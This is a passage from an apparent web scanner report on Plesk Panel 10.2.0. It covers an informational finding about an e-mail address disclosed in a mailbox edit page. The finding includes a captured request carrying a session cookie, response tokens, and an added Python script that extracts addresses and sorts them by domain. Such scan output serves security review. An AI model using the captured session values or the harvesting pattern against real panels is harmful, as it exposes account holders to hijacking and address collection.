<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Issue detail

The following email address was disclosed in the response:
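
The check behind this finding is a pattern match for e-mail addresses over the response body. In this case the response is the edit form for the mailbox itself, fetched by the logged-in Control Panel user (the address appears in the page title and heading), so the hit is the user's own data and the Information severity is the right one; for a least-privileged user, the hits worth a manual look are addresses under a domain that does not belong to the authenticated subscription. The following Python is an added triage aid, not part of the XSS.CX report and not Plesk code: it reproduces the scanner's match and then splits the hits by domain. The sample response fragment is constructed from the title, heading and form field visible in the response below; the support@example.net link, the own_domains list and the function names are assumptions made for the illustration.

```python
import re
from html import unescape

# Constructed sample, abridged from the Plesk edit-page response shown in this section.
# The support@example.net link is an added line so the triage has something to separate.
SAMPLE_RESPONSE = """\
<title>format-2@nosedivesailing.com - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<h2><span><b>format-2@nosedivesailing.com</b></span></h2>
<a href="mailto:support@example.net">Support</a>
<input type="text" name="general[generalSection][name]" value="format-2" class="input-text" />@vulnerable.host.fqdn
"""

# Same shape of pattern a scanner uses for its "email address disclosed" check.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def find_addresses(body):
    """Distinct e-mail addresses in a response body, lower-cased, in order of first appearance.

    The body is HTML-unescaped first so that an entity-encoded '@' (&#64;) is still caught.
    """
    found = []
    for match in EMAIL_RE.finditer(unescape(body)):
        addr = match.group(0).lower()
        if addr not in found:
            found.append(addr)
    return found


def triage(addresses, own_domains):
    """Split hits into (expected, unexpected).

    expected   = addresses under a domain of the subscription the scan is logged in to;
                 on a mailbox edit page this is the user's own data, so it is informational.
    unexpected = addresses under any other domain; for a least-privileged user these are
                 the hits worth a manual look, since they may belong to another tenant.
    """
    own = {d.lower().lstrip("@") for d in own_domains}
    expected, unexpected = [], []
    for addr in addresses:
        domain = addr.rsplit("@", 1)[1]
        (expected if domain in own else unexpected).append(addr)
    return expected, unexpected


if __name__ == "__main__":
    hits = find_addresses(SAMPLE_RESPONSE)
    ok, suspect = triage(hits, ["nosedivesailing.com"])
    print("expected  :", ok)
    print("unexpected:", suspect)
```

Run against a whole authenticated crawl, the own_domains list should be the domains of the subscription the test account is logged in to (here vulnerable.host.fqdn, the one shown in the subscription switch); anything that lands in the unexpected list is the case to chase, because a least-privileged user should not be shown another subscription's mailboxes.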

Request

GET /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:52:19 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:52:19 GMT
Connection: close
Content-Length: 38577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>format-2@nosedivesailing.com - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F4' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-2@nosedivesailing.com</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="format-2" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
